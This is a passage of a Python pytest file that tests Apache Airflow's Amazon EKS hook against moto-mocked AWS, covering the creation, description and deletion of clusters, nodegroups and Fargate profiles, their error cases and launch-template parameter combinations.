NODEGROUP_NOT_FOUND_MSG,
)
from airflow.providers.amazon.aws.hooks.eks import EksHook
from ..utils.eks_test_constants import (
DEFAULT_CONN_ID,
DEFAULT_NAMESPACE,
DISK_SIZE,
FROZEN_TIME,
INSTANCE_TYPES,
LAUNCH_TEMPLATE,
MAX_FARGATE_LABELS,
NODEGROUP_OWNERSHIP_TAG_DEFAULT_VALUE,
NODEGROUP_OWNERSHIP_TAG_KEY,
NON_EXISTING_CLUSTER_NAME,
NON_EXISTING_FARGATE_PROFILE_NAME,
NON_EXISTING_NODEGROUP_NAME,
PARTITION,
POD_EXECUTION_ROLE_ARN,
REGION,
REMOTE_ACCESS,
BatchCountSize,
ClusterAttributes,
ClusterInputs,
ErrorAttributes,
FargateProfileAttributes,
FargateProfileInputs,
NodegroupAttributes,
NodegroupInputs,
PossibleTestResults,
RegExTemplates,
ResponseAttributes,
)
from ..utils.eks_test_utils import (
attributes_to_test,
generate_clusters,
generate_dict,
generate_fargate_profiles,
generate_nodegroups,
iso_date,
region_matches_partition,
)
@pytest.fixture(scope="function")
def cluster_builder():
"""A fixture to generate a batch of EKS Clusters on the mocked backend for testing."""
class ClusterTestDataFactory:
"""A Factory class for building the Cluster objects."""
def __init__(self, count: int, minimal: bool) -> None:
# Generate 'count' number of Cluster objects.
self.cluster_names: list[str] = generate_clusters(
eks_hook=eks_hook, num_clusters=count, minimal=minimal
)
self.existing_cluster_name: str = self.cluster_names[0]
self.nonexistent_cluster_name: str = NON_EXISTING_CLUSTER_NAME
# Collect the output of describe_cluster() for the first Cluster.
self.cluster_describe_output: dict = eks_hook.describe_cluster(name=self.existing_cluster_name)[
ResponseAttributes.CLUSTER
]
# Generate a list of the Cluster attributes to be tested when validating results.
self.attributes_to_test: list[tuple] = attributes_to_test(
inputs=ClusterInputs, cluster_name=self.existing_cluster_name
)
def _execute(count: int = 1, minimal: bool = True) -> tuple[EksHook, ClusterTestDataFactory]:
return eks_hook, ClusterTestDataFactory(count=count, minimal=minimal)
mock_eks().start()
eks_hook = EksHook(
aws_conn_id=DEFAULT_CONN_ID,
region_name=REGION,
)
yield _execute
mock_eks().stop()
@pytest.fixture(scope="function")
def fargate_profile_builder(cluster_builder):
"""A fixture to generate a batch of EKS Fargate profiles on the mocked backend for testing."""
class FargateProfileTestDataFactory:
"""A Factory class for building the Fargate profile objects."""
def __init__(self, count: int, minimal: bool) -> None:
self.cluster_name = cluster.existing_cluster_name
# Generate 'count' number of FargateProfile objects.
self.fargate_profile_names = generate_fargate_profiles(
eks_hook=eks_hook,
cluster_name=self.cluster_name,
num_profiles=count,
minimal=minimal,
)
# Get the name of the first generated profile.
self.existing_fargate_profile_name: str = self.fargate_profile_names[0]
self.nonexistent_fargate_profile_name: str = NON_EXISTING_FARGATE_PROFILE_NAME
self.nonexistent_cluster_name: str = NON_EXISTING_CLUSTER_NAME
# Collect the output of describe_fargate_profiles() for the first profile.
self.fargate_describe_output: dict = eks_hook.describe_fargate_profile(
clusterName=self.cluster_name, fargateProfileName=self.existing_fargate_profile_name
)[ResponseAttributes.FARGATE_PROFILE]
# Generate a list of the Fargate Profile attributes to be tested when validating results.
self.attributes_to_test: list[tuple] = attributes_to_test(
inputs=FargateProfileInputs,
cluster_name=self.cluster_name,
fargate_profile_name=self.existing_fargate_profile_name,
)
def _execute(count: int = 1, minimal: bool = True) -> tuple[EksHook, FargateProfileTestDataFactory]:
return eks_hook, FargateProfileTestDataFactory(count=count, minimal=minimal)
eks_hook, cluster = cluster_builder()
return _execute
@pytest.fixture(scope="function")
def nodegroup_builder(cluster_builder):
"""A fixture to generate a batch of EKS Managed Nodegroups on the mocked backend for testing."""
class NodegroupTestDataFactory:
"""A Factory class for building the Nodegroup objects."""
def __init__(self, count: int, minimal: bool) -> None:
self.cluster_name: str = cluster.existing_cluster_name
# Generate 'count' number of Nodegroup objects.
self.nodegroup_names: list[str] = generate_nodegroups(
eks_hook=eks_hook,
cluster_name=self.cluster_name,
num_nodegroups=count,
minimal=minimal,
)
# Get the name of the first generated Nodegroup.
self.existing_nodegroup_name: str = self.nodegroup_names[0]
self.nonexistent_nodegroup_name: str = NON_EXISTING_NODEGROUP_NAME
self.nonexistent_cluster_name: str = NON_EXISTING_CLUSTER_NAME
# Collect the output of describe_nodegroup() for the first Nodegroup.
self.nodegroup_describe_output: dict = eks_hook.describe_nodegroup(
clusterName=self.cluster_name, nodegroupName=self.existing_nodegroup_name
)[ResponseAttributes.NODEGROUP]
# Generate a list of the Nodegroup attributes to be tested when validating results.
self.attributes_to_test: list[tuple] = attributes_to_test(
inputs=NodegroupInputs,
cluster_name=self.cluster_name,
nodegroup_name=self.existing_nodegroup_name,
)
def _execute(count: int = 1, minimal: bool = True) -> tuple[EksHook, NodegroupTestDataFactory]:
return eks_hook, NodegroupTestDataFactory(count=count, minimal=minimal)
eks_hook, cluster = cluster_builder()
return _execute
class TestEksHooks:
def test_hook(self, cluster_builder) -> None:
eks_hook, _ = cluster_builder()
assert eks_hook.get_conn() is not None
assert eks_hook.aws_conn_id == DEFAULT_CONN_ID
assert eks_hook.region_name == REGION
###
# This specific test does not use the fixture since
# it is intended to verify that there are no clusters
# in the list at initialization, which means the mock
# decorator must be used manually in this one case.
###
@mock_eks
def test_list_clusters_returns_empty_by_default(self) -> None:
eks_hook: EksHook = EksHook(aws_conn_id=DEFAULT_CONN_ID, region_name=REGION)
result: list = eks_hook.list_clusters()
assert isinstance(result, list)
assert len(result) == 0
def test_list_clusters_returns_sorted_cluster_names(
self, cluster_builder, initial_batch_size: int = BatchCountSize.SMALL
) -> None:
eks_hook, generated_test_data = cluster_builder(count=initial_batch_size)
expected_result: list = sorted(generated_test_data.cluster_names)
result: list = eks_hook.list_clusters()
assert_result_matches_expected_list(result, expected_result, initial_batch_size)
def test_list_clusters_returns_all_results(
self, cluster_builder, initial_batch_size: int = BatchCountSize.LARGE
) -> None:
eks_hook, generated_test_data = cluster_builder(count=initial_batch_size)
expected_result: list = sorted(generated_test_data.cluster_names)
result: list = eks_hook.list_clusters()
assert_result_matches_expected_list(result, expected_result)
def test_create_cluster_throws_exception_when_cluster_exists(
self, cluster_builder, initial_batch_size: int = BatchCountSize.SMALL
) -> None:
eks_hook, generated_test_data = cluster_builder(count=initial_batch_size)
expected_exception: type[AWSError] = ResourceInUseException
expected_msg: str = CLUSTER_EXISTS_MSG.format(
clusterName=generated_test_data.existing_cluster_name,
)
with pytest.raises(ClientError) as raised_exception:
eks_hook.create_cluster(
name=generated_test_data.existing_cluster_name, **dict(ClusterInputs.REQUIRED) # type: ignore
)
assert_client_error_exception_thrown(
expected_exception=expected_exception,
expected_msg=expected_msg,
raised_exception=raised_exception,
)
# Verify no new cluster was created.
len_after_test: int = len(eks_hook.list_clusters())
assert len_after_test == initial_batch_size
def test_create_cluster_generates_valid_cluster_arn(self, cluster_builder) -> None:
_, generated_test_data = cluster_builder()
expected_arn_values: list = [
PARTITION,
REGION,
DEFAULT_ACCOUNT_ID,
generated_test_data.cluster_names,
]
assert_all_arn_values_are_valid(
expected_arn_values=expected_arn_values,
pattern=RegExTemplates.CLUSTER_ARN,
arn_under_test=generated_test_data.cluster_describe_output[ClusterAttributes.ARN],
)
@freeze_time(FROZEN_TIME)
def test_create_cluster_generates_valid_cluster_created_timestamp(self, cluster_builder) -> None:
_, generated_test_data = cluster_builder()
result_time: datetime = generated_test_data.cluster_describe_output[ClusterAttributes.CREATED_AT]
assert iso_date(result_time) == FROZEN_TIME
def test_create_cluster_generates_valid_cluster_endpoint(self, cluster_builder) -> None:
_, generated_test_data = cluster_builder()
result_endpoint: str = generated_test_data.cluster_describe_output[ClusterAttributes.ENDPOINT]
assert_is_valid_uri(result_endpoint)
def test_create_cluster_generates_valid_oidc_identity(self, cluster_builder) -> None:
_, generated_test_data = cluster_builder()
result_issuer: str = generated_test_data.cluster_describe_output[ClusterAttributes.IDENTITY][
ClusterAttributes.OIDC
][ClusterAttributes.ISSUER]
assert_is_valid_uri(result_issuer)
def test_create_cluster_saves_provided_parameters(self, cluster_builder) -> None:
_, generated_test_data = cluster_builder(minimal=False)
for key, expected_value in generated_test_data.attributes_to_test:
assert generated_test_data.cluster_describe_output[key] == expected_value
def test_describe_cluster_throws_exception_when_cluster_not_found(
self, cluster_builder, initial_batch_size: int = BatchCountSize.SMALL
) -> None:
eks_hook, generated_test_data = cluster_builder(count=initial_batch_size)
expected_exception: type[AWSError] = ResourceNotFoundException
expected_msg = CLUSTER_NOT_FOUND_MSG.format(
clusterName=generated_test_data.nonexistent_cluster_name,
)
with pytest.raises(ClientError) as raised_exception:
eks_hook.describe_cluster(name=generated_test_data.nonexistent_cluster_name)
assert_client_error_exception_thrown(
expected_exception=expected_exception,
expected_msg=expected_msg,
raised_exception=raised_exception,
)
def test_delete_cluster_returns_deleted_cluster(
self, cluster_builder, initial_batch_size: int = BatchCountSize.SMALL
) -> None:
eks_hook, generated_test_data = cluster_builder(count=initial_batch_size, minimal=False)
result: dict = eks_hook.delete_cluster(name=generated_test_data.existing_cluster_name)[
ResponseAttributes.CLUSTER
]
for key, expected_value in generated_test_data.attributes_to_test:
assert result[key] == expected_value
def test_delete_cluster_removes_deleted_cluster(
self, cluster_builder, initial_batch_size: int = BatchCountSize.SMALL
) -> None:
eks_hook, generated_test_data = cluster_builder(count=initial_batch_size, minimal=False)
eks_hook.delete_cluster(name=generated_test_data.existing_cluster_name)
result_cluster_list: list = eks_hook.list_clusters()
assert len(result_cluster_list) == (initial_batch_size - 1)
assert generated_test_data.existing_cluster_name not in result_cluster_list
def test_delete_cluster_throws_exception_when_cluster_not_found(
self, cluster_builder, initial_batch_size: int = BatchCountSize.SMALL
) -> None:
eks_hook, generated_test_data = cluster_builder(count=initial_batch_size)
expected_exception: type[AWSError] = ResourceNotFoundException
expected_msg: str = CLUSTER_NOT_FOUND_MSG.format(
clusterName=generated_test_data.nonexistent_cluster_name,
)
with pytest.raises(ClientError) as raised_exception:
eks_hook.delete_cluster(name=generated_test_data.nonexistent_cluster_name)
assert_client_error_exception_thrown(
expected_exception=expected_exception,
expected_msg=expected_msg,
raised_exception=raised_exception,
)
# Verify nothing was deleted.
cluster_count_after_test: int = len(eks_hook.list_clusters())
assert cluster_count_after_test == initial_batch_size
def test_list_nodegroups_returns_empty_by_default(self, cluster_builder) -> None:
eks_hook, generated_test_data = cluster_builder()
result: list = eks_hook.list_nodegroups(clusterName=generated_test_data.existing_cluster_name)
assert isinstance(result, list)
assert len(result) == 0
def test_list_nodegroups_returns_sorted_nodegroup_names(
self, nodegroup_builder, initial_batch_size: int = BatchCountSize.SMALL
) -> None:
eks_hook, generated_test_data = nodegroup_builder(count=initial_batch_size)
expected_result: list = sorted(generated_test_data.nodegroup_names)
result: list = eks_hook.list_nodegroups(clusterName=generated_test_data.cluster_name)
assert_result_matches_expected_list(result, expected_result, initial_batch_size)
def test_list_nodegroups_returns_all_results(
self, nodegroup_builder, initial_batch_size: int = BatchCountSize.LARGE
) -> None:
eks_hook, generated_test_data = nodegroup_builder(count=initial_batch_size)
expected_result: list = sorted(generated_test_data.nodegroup_names)
result: list = eks_hook.list_nodegroups(clusterName=generated_test_data.cluster_name)
assert_result_matches_expected_list(result, expected_result)
@mock_eks
def test_create_nodegroup_throws_exception_when_cluster_not_found(self) -> None:
eks_hook: EksHook = EksHook(aws_conn_id=DEFAULT_CONN_ID, region_name=REGION)
non_existent_cluster_name: str = NON_EXISTING_CLUSTER_NAME
non_existent_nodegroup_name: str = NON_EXISTING_NODEGROUP_NAME
expected_exception: type[AWSError] = ResourceNotFoundException
expected_msg: str = CLUSTER_NOT_FOUND_MSG.format(
clusterName=non_existent_cluster_name,
)
with pytest.raises(ClientError) as raised_exception:
eks_hook.create_nodegroup(
clusterName=non_existent_cluster_name,
nodegroupName=non_existent_nodegroup_name,
**dict(NodegroupInputs.REQUIRED), # type: ignore
)
assert_client_error_exception_thrown(
expected_exception=expected_exception,
expected_msg=expected_msg,
raised_exception=raised_exception,
)
def test_create_nodegroup_throws_exception_when_nodegroup_already_exists(
self, nodegroup_builder, initial_batch_size: int = BatchCountSize.SMALL
) -> None:
eks_hook, generated_test_data = nodegroup_builder(count=initial_batch_size)
expected_exception: type[AWSError] = ResourceInUseException
expected_msg: str = NODEGROUP_EXISTS_MSG.format(
clusterName=generated_test_data.cluster_name,
nodegroupName=generated_test_data.existing_nodegroup_name,
)
with pytest.raises(ClientError) as raised_exception:
eks_hook.create_nodegroup(
clusterName=generated_test_data.cluster_name,
nodegroupName=generated_test_data.existing_nodegroup_name,
**dict(NodegroupInputs.REQUIRED), # type: ignore
)
assert_client_error_exception_thrown(
expected_exception=expected_exception,
expected_msg=expected_msg,
raised_exception=raised_exception,
)
# Verify no new nodegroup was created.
nodegroup_count_after_test = len(
eks_hook.list_nodegroups(clusterName=generated_test_data.cluster_name)
)
assert nodegroup_count_after_test == initial_batch_size
def test_create_nodegroup_throws_exception_when_cluster_not_active(
self, nodegroup_builder, initial_batch_size: int = BatchCountSize.SMALL
) -> None:
eks_hook, generated_test_data = nodegroup_builder(count=initial_batch_size)
non_existent_nodegroup_name: str = NON_EXISTING_NODEGROUP_NAME
expected_exception: type[AWSError] = InvalidRequestException
expected_msg: str = CLUSTER_NOT_READY_MSG.format(
clusterName=generated_test_data.cluster_name,
)
with mock.patch("moto.eks.models.Cluster.isActive", return_value=False):
with pytest.raises(ClientError) as raised_exception:
eks_hook.create_nodegroup(
clusterName=generated_test_data.cluster_name,
nodegroupName=non_existent_nodegroup_name,
**dict(NodegroupInputs.REQUIRED), # type: ignore
)
assert_client_error_exception_thrown(
expected_exception=expected_exception,
expected_msg=expected_msg,
raised_exception=raised_exception,
)
# Verify no new nodegroup was created.
nodegroup_count_after_test = len(
eks_hook.list_nodegroups(clusterName=generated_test_data.cluster_name)
)
assert nodegroup_count_after_test == initial_batch_size
def test_create_nodegroup_generates_valid_nodegroup_arn(self, nodegroup_builder) -> None:
_, generated_test_data = nodegroup_builder()
expected_arn_values: list = [
PARTITION,
REGION,
DEFAULT_ACCOUNT_ID,
generated_test_data.cluster_name,
generated_test_data.nodegroup_names,
None,
]
assert_all_arn_values_are_valid(
expected_arn_values=expected_arn_values,
pattern=RegExTemplates.NODEGROUP_ARN,
arn_under_test=generated_test_data.nodegroup_describe_output[NodegroupAttributes.ARN],
)
@freeze_time(FROZEN_TIME)
def test_create_nodegroup_generates_valid_nodegroup_created_timestamp(self, nodegroup_builder) -> None:
_, generated_test_data = nodegroup_builder()
result_time: datetime = generated_test_data.nodegroup_describe_output[NodegroupAttributes.CREATED_AT]
assert iso_date(result_time) == FROZEN_TIME
@freeze_time(FROZEN_TIME)
def test_create_nodegroup_generates_valid_nodegroup_modified_timestamp(self, nodegroup_builder) -> None:
_, generated_test_data = nodegroup_builder()
result_time: datetime = generated_test_data.nodegroup_describe_output[NodegroupAttributes.MODIFIED_AT]
assert iso_date(result_time) == FROZEN_TIME
def test_create_nodegroup_generates_valid_autoscaling_group_name(self, nodegroup_builder) -> None:
_, generated_test_data = nodegroup_builder()
result_resources: dict = generated_test_data.nodegroup_describe_output[NodegroupAttributes.RESOURCES]
result_asg_name: str = result_resources[NodegroupAttributes.AUTOSCALING_GROUPS][0][
NodegroupAttributes.NAME
]
assert RegExTemplates.NODEGROUP_ASG_NAME_PATTERN.match(result_asg_name)
def test_create_nodegroup_generates_valid_security_group_name(self, nodegroup_builder) -> None:
_, generated_test_data = nodegroup_builder()
result_resources: dict = generated_test_data.nodegroup_describe_output[NodegroupAttributes.RESOURCES]
result_security_group: str = result_resources[NodegroupAttributes.REMOTE_ACCESS_SG]
assert RegExTemplates.NODEGROUP_SECURITY_GROUP_NAME_PATTERN.match(result_security_group)
def test_create_nodegroup_saves_provided_parameters(self, nodegroup_builder) -> None:
_, generated_test_data = nodegroup_builder(minimal=False)
for key, expected_value in generated_test_data.attributes_to_test:
assert generated_test_data.nodegroup_describe_output[key] == expected_value
def test_create_nodegroup_without_tags_uses_default(self, nodegroup_builder) -> None:
_, generated_test_data = nodegroup_builder()
tag_list: dict = generated_test_data.nodegroup_describe_output[NodegroupAttributes.TAGS]
ownership_tag_key: str = NODEGROUP_OWNERSHIP_TAG_KEY.format(
cluster_name=generated_test_data.cluster_name
)
assert tag_list.get(ownership_tag_key) == NODEGROUP_OWNERSHIP_TAG_DEFAULT_VALUE
def test_create_nodegroup_with_ownership_tag_uses_provided_value(self, cluster_builder) -> None:
eks_hook, generated_test_data = cluster_builder()
cluster_name: str = generated_test_data.existing_cluster_name
ownership_tag_key: str = NODEGROUP_OWNERSHIP_TAG_KEY.format(cluster_name=cluster_name)
provided_tag_value: str = "shared"
created_nodegroup: dict = eks_hook.create_nodegroup(
clusterName=cluster_name,
nodegroupName="nodegroup",
tags={ownership_tag_key: provided_tag_value},
**dict(deepcopy(NodegroupInputs.REQUIRED)),
)[ResponseAttributes.NODEGROUP]
tags = created_nodegroup.get(NodegroupAttributes.TAGS)
assert tags is not None
assert tags.get(ownership_tag_key) == provided_tag_value
def test_describe_nodegroup_throws_exception_when_cluster_not_found(self, nodegroup_builder) -> None:
eks_hook, generated_test_data = nodegroup_builder()
expected_exception: type[AWSError] = ResourceNotFoundException
expected_msg: str = CLUSTER_NOT_FOUND_MSG.format(
clusterName=generated_test_data.nonexistent_cluster_name,
)
with pytest.raises(ClientError) as raised_exception:
eks_hook.describe_nodegroup(
clusterName=generated_test_data.nonexistent_cluster_name,
nodegroupName=generated_test_data.existing_nodegroup_name,
)
assert_client_error_exception_thrown(
expected_exception=expected_exception,
expected_msg=expected_msg,
raised_exception=raised_exception,
)
def test_describe_nodegroup_throws_exception_when_nodegroup_not_found(self, nodegroup_builder) -> None:
eks_hook, generated_test_data = nodegroup_builder()
expected_exception: type[AWSError] = ResourceNotFoundException
expected_msg: str = NODEGROUP_NOT_FOUND_MSG.format(
nodegroupName=generated_test_data.nonexistent_nodegroup_name,
)
with pytest.raises(ClientError) as raised_exception:
eks_hook.describe_nodegroup(
clusterName=generated_test_data.cluster_name,
nodegroupName=generated_test_data.nonexistent_nodegroup_name,
)
assert_client_error_exception_thrown(
expected_exception=expected_exception,
expected_msg=expected_msg,
raised_exception=raised_exception,
)
def test_delete_cluster_throws_exception_when_nodegroups_exist(self, nodegroup_builder) -> None:
eks_hook, generated_test_data = nodegroup_builder()
expected_exception: type[AWSError] = ResourceInUseException
expected_msg: str = CLUSTER_IN_USE_MSG
with pytest.raises(ClientError) as raised_exception:
eks_hook.delete_cluster(name=generated_test_data.cluster_name)
assert_client_error_exception_thrown(
expected_exception=expected_exception,
expected_msg=expected_msg,
raised_exception=raised_exception,
)
# Verify no clusters were deleted.
cluster_count_after_test: int = len(eks_hook.list_clusters())
assert cluster_count_after_test == BatchCountSize.SINGLE
def test_delete_nodegroup_removes_deleted_nodegroup(
self, nodegroup_builder, initial_batch_size: int = BatchCountSize.SMALL
) -> None:
eks_hook, generated_test_data = nodegroup_builder(count=initial_batch_size)
eks_hook.delete_nodegroup(
clusterName=generated_test_data.cluster_name,
nodegroupName=generated_test_data.existing_nodegroup_name,
)
result_nodegroup_list: list = eks_hook.list_nodegroups(clusterName=generated_test_data.cluster_name)
assert len(result_nodegroup_list) == (initial_batch_size - 1)
assert generated_test_data.existing_nodegroup_name not in result_nodegroup_list
def test_delete_nodegroup_returns_deleted_nodegroup(
self, nodegroup_builder, initial_batch_size: int = BatchCountSize.SMALL
) -> None:
eks_hook, generated_test_data = nodegroup_builder(count=initial_batch_size, minimal=False)
result: dict = eks_hook.delete_nodegroup(
clusterName=generated_test_data.cluster_name,
nodegroupName=generated_test_data.existing_nodegroup_name,
)[ResponseAttributes.NODEGROUP]
for key, expected_value in generated_test_data.attributes_to_test:
assert result[key] == expected_value
def test_delete_nodegroup_throws_exception_when_cluster_not_found(self, nodegroup_builder) -> None:
eks_hook, generated_test_data = nodegroup_builder()
expected_exception: type[AWSError] = ResourceNotFoundException
expected_msg: str = CLUSTER_NOT_FOUND_MSG.format(
clusterName=generated_test_data.nonexistent_cluster_name,
)
with pytest.raises(ClientError) as raised_exception:
eks_hook.delete_nodegroup(
clusterName=generated_test_data.nonexistent_cluster_name,
nodegroupName=generated_test_data.existing_nodegroup_name,
)
assert_client_error_exception_thrown(
expected_exception=expected_exception,
expected_msg=expected_msg,
raised_exception=raised_exception,
)
def test_delete_nodegroup_throws_exception_when_nodegroup_not_found(
self, nodegroup_builder, initial_batch_size: int = BatchCountSize.SMALL
) -> None:
eks_hook, generated_test_data = nodegroup_builder(count=initial_batch_size)
expected_exception: type[AWSError] = ResourceNotFoundException
expected_msg: str = NODEGROUP_NOT_FOUND_MSG.format(
nodegroupName=generated_test_data.nonexistent_nodegroup_name,
)
with pytest.raises(ClientError) as raised_exception:
eks_hook.delete_nodegroup(
clusterName=generated_test_data.cluster_name,
nodegroupName=generated_test_data.nonexistent_nodegroup_name,
)
assert_client_error_exception_thrown(
expected_exception=expected_exception,
expected_msg=expected_msg,
raised_exception=raised_exception,
)
        # Verify no nodegroup was deleted.
nodegroup_count_after_test: int = len(
eks_hook.list_nodegroups(clusterName=generated_test_data.cluster_name)
)
assert nodegroup_count_after_test == initial_batch_size
    # If launch_template is specified, you cannot specify instanceTypes, diskSize, or remoteAccess.
test_cases = [
# Happy Paths
(LAUNCH_TEMPLATE, None, None, None, PossibleTestResults.SUCCESS),
(None, INSTANCE_TYPES, DISK_SIZE, REMOTE_ACCESS, PossibleTestResults.SUCCESS),
(None, None, DISK_SIZE, REMOTE_ACCESS, PossibleTestResults.SUCCESS),
(None, INSTANCE_TYPES, None, REMOTE_ACCESS, PossibleTestResults.SUCCESS),
(None, INSTANCE_TYPES, DISK_SIZE, None, PossibleTestResults.SUCCESS),
(None, INSTANCE_TYPES, None, None, PossibleTestResults.SUCCESS),
(None, None, DISK_SIZE, None, PossibleTestResults.SUCCESS),
(None, None, None, REMOTE_ACCESS, PossibleTestResults.SUCCESS),
(None, None, None, None, PossibleTestResults.SUCCESS),
# Unhappy Paths
(LAUNCH_TEMPLATE, INSTANCE_TYPES, None, None, PossibleTestResults.FAILURE),
(LAUNCH_TEMPLATE, None, DISK_SIZE, None, PossibleTestResults.FAILURE),
(LAUNCH_TEMPLATE, None, None, REMOTE_ACCESS, PossibleTestResults.FAILURE),
(LAUNCH_TEMPLATE, INSTANCE_TYPES, DISK_SIZE, None, PossibleTestResults.FAILURE),
(LAUNCH_TEMPLATE, INSTANCE_TYPES, None, REMOTE_ACCESS, PossibleTestResults.FAILURE),
(LAUNCH_TEMPLATE, None, DISK_SIZE, REMOTE_ACCESS, PossibleTestResults.FAILURE),
(LAUNCH_TEMPLATE, INSTANCE_TYPES, DISK_SIZE, REMOTE_ACCESS, PossibleTestResults.FAILURE),
]
@pytest.mark.parametrize(
"launch_template, instance_types, disk_size, remote_access, expected_result",
test_cases,
)
def test_create_nodegroup_handles_launch_template_combinations(
self,
cluster_builder,
launch_template,
instance_types,
disk_size,
remote_access,
expected_result,
):
eks_hook, generated_test_data = cluster_builder()
nodegroup_name: str = NON_EXISTING_NODEGROUP_NAME
expected_exception: type[AWSError] = InvalidParameterException
expected_message: str = ""
test_inputs = dict(
deepcopy(
# Required Constants
NodegroupInputs.REQUIRED
# Required Variables
+ [
(
ClusterAttributes.CLUSTER_NAME,
generated_test_data.existing_cluster_name,
),
(NodegroupAttributes.NODEGROUP_NAME, nodegroup_name),
]
# Test Case Values
+ [_ for _ in [launch_template, instance_types, disk_size, remote_access] if _]
)
)
if expected_result == PossibleTestResults.SUCCESS:
result: dict = eks_hook.create_nodegroup(**test_inputs)[ResponseAttributes.NODEGROUP]
expected_output = deepcopy(test_inputs)
# The Create Nodegroup hook magically adds the required
# cluster/owned tag, so add that to the expected outputs.
expected_output["tags"] = {
f"kubernetes.io/cluster/{generated_test_data.existing_cluster_name}": "owned"
}
for key, expected_value in expected_output.items():
assert result[key] == expected_value
else:
if launch_template and disk_size:
expected_message = LAUNCH_TEMPLATE_WITH_DISK_SIZE_MSG
elif launch_template and remote_access:
expected_message = LAUNCH_TEMPLATE_WITH_REMOTE_ACCESS_MSG
# Docs say this combination throws an exception but testing shows that
# instanceTypes overrides the launchTemplate instance values instead.
# Leaving here for easier correction if/when that gets fixed.
elif launch_template and instance_types:
pass
if expected_message:
with pytest.raises(ClientError) as raised_exception:
eks_hook.create_nodegroup(**test_inputs)
assert_client_error_exception_thrown(
expected_exception=expected_exception,
expected_msg=expected_message,
raised_exception=raised_exception,
)
def test_list_fargate_profiles_returns_empty_by_default(self, cluster_builder) -> None:
eks_hook, generated_test_data = cluster_builder()
result: list = eks_hook.list_fargate_profiles(clusterName=generated_test_data.existing_cluster_name)
assert isinstance(result, list)
assert len(result) == 0
def test_list_fargate_profiles_returns_sorted_profile_names(
self, fargate_profile_builder, initial_batch_size: int = BatchCountSize.SMALL
) -> None:
eks_hook, generated_test_data = fargate_profile_builder(count=initial_batch_size)
expected_result: list = sorted(generated_test_data.fargate_profile_names)
result: list = eks_hook.list_fargate_profiles(clusterName=generated_test_data.cluster_name)
assert_result_matches_expected_list(result, expected_result, initial_batch_size)
def test_list_fargate_profiles_returns_all_results(
self, fargate_profile_builder, initial_batch_size: int = BatchCountSize.LARGE
) -> None:
eks_hook, generated_test_data = fargate_profile_builder(count=initial_batch_size)
expected_result: list = sorted(generated_test_data.fargate_profile_names)
result: list = eks_hook.list_fargate_profiles(clusterName=generated_test_data.cluster_name)
assert_result_matches_expected_list(result, expected_result)
@mock_eks
def test_create_fargate_profile_throws_exception_when_cluster_not_found(self) -> None:
eks_hook: EksHook = EksHook(aws_conn_id=DEFAULT_CONN_ID, region_name=REGION)
non_existent_cluster_name: str = NON_EXISTING_CLUSTER_NAME
non_existent_fargate_profile_name: str = NON_EXISTING_FARGATE_PROFILE_NAME
expected_exception: type[AWSError] = ResourceNotFoundException
expected_msg: str = CLUSTER_NOT_FOUND_MSG.format(clusterName=non_existent_cluster_name)
with pytest.raises(ClientError) as raised_exception:
eks_hook.create_fargate_profile(
clusterName=non_existent_cluster_name,
fargateProfileName=non_existent_fargate_profile_name,
**dict(FargateProfileInputs.REQUIRED), # type: ignore
)
assert_client_error_exception_thrown(
expected_exception=expected_exception,
expected_msg=expected_msg,
raised_exception=raised_exception,
)
def test_create_fargate_profile_throws_exception_when_fargate_profile_already_exists(
self, fargate_profile_builder, initial_batch_size: int = BatchCountSize.SMALL
) -> None:
eks_hook, generated_test_data = fargate_profile_builder(count=initial_batch_size)
expected_exception: type[AWSError] = ResourceInUseException
expected_msg: str = FARGATE_PROFILE_EXISTS_MSG
with pytest.raises(ClientError) as raised_exception:
eks_hook.create_fargate_profile(
clusterName=generated_test_data.cluster_name,
fargateProfileName=generated_test_data.existing_fargate_profile_name,
**dict(FargateProfileInputs.REQUIRED), # type: ignore
)
assert_client_error_exception_thrown(
expected_exception=expected_exception,
expected_msg=expected_msg,
raised_exception=raised_exception,
)
# Verify no new Fargate profile was created.
fargate_profile_count_after_test: int = len(
eks_hook.list_fargate_profiles(clusterName=generated_test_data.cluster_name)
)
assert fargate_profile_count_after_test == initial_batch_size
def test_create_fargate_profile_throws_exception_when_cluster_not_active(
self, fargate_profile_builder, initial_batch_size: int = BatchCountSize.SMALL
) -> None:
eks_hook, generated_test_data = fargate_profile_builder(count=initial_batch_size)
non_existent_fargate_profile_name: str = NON_EXISTING_FARGATE_PROFILE_NAME
expected_exception: type[AWSError] = InvalidRequestException
expected_msg: str = CLUSTER_NOT_READY_MSG.format(
clusterName=generated_test_data.cluster_name,
)
with mock.patch("moto.eks.models.Cluster.isActive", return_value=False):
with pytest.raises(ClientError) as raised_exception:
eks_hook.create_fargate_profile(
clusterName=generated_test_data.cluster_name,
fargateProfileName=non_existent_fargate_profile_name,
**dict(FargateProfileInputs.REQUIRED), # type: ignore
)
assert_client_error_exception_thrown(
expected_exception=expected_exception,
expected_msg=expected_msg,
raised_exception=raised_exception,
)
# Verify no new Fargate profile was created.
fargate_profile_count_after_test: int = len(
eks_hook.list_fargate_profiles(clusterName=generated_test_data.cluster_name)
)
assert fargate_profile_count_after_test == initial_batch_size
def test_create_fargate_profile_generates_valid_profile_arn(self, fargate_profile_builder) -> None:
_, generated_test_data = fargate_profile_builder()
expected_arn_values: list = [
PARTITION,
REGION,
DEFAULT_ACCOUNT_ID,
generated_test_data.cluster_name,
generated_test_data.fargate_profile_names,
None,
]
assert_all_arn_values_are_valid(
expected_arn_values=expected_arn_values,
pattern=RegExTemplates.FARGATE_PROFILE_ARN,
arn_under_test=generated_test_data.fargate_describe_output[FargateProfileAttributes.ARN],
)
@freeze_time(FROZEN_TIME)
def test_create_fargate_profile_generates_valid_created_timestamp(self, fargate_profile_builder) -> None:
_, generated_test_data = fargate_profile_builder()
result_time: datetime = generated_test_data.fargate_describe_output[
FargateProfileAttributes.CREATED_AT
]
assert iso_date(result_time) == FROZEN_TIME
def test_create_fargate_profile_saves_provided_parameters(self, fargate_profile_builder) -> None:
_, generated_test_data = fargate_profile_builder(minimal=False)
for key, expected_value in generated_test_data.attributes_to_test:
assert generated_test_data.fargate_describe_output[key] == expected_value
def test_describe_fargate_profile_throws_exception_when_cluster_not_found(
self, fargate_profile_builder
) -> None:
eks_hook, generated_test_data = fargate_profile_builder()
expected_exception: type[AWSError] = ResourceNotFoundException
expected_msg: str = CLUSTER_NOT_FOUND_MSG.format(
clusterName=generated_test_data.nonexistent_cluster_name,
)
with pytest.raises(ClientError) as raised_exception:
eks_hook.describe_fargate_profile(
clusterName=generated_test_data.nonexistent_cluster_name,
fargateProfileName=generated_test_data.existing_fargate_profile_name,
)
assert_client_error_exception_thrown(
expected_exception=expected_exception,
expected_msg=expected_msg,
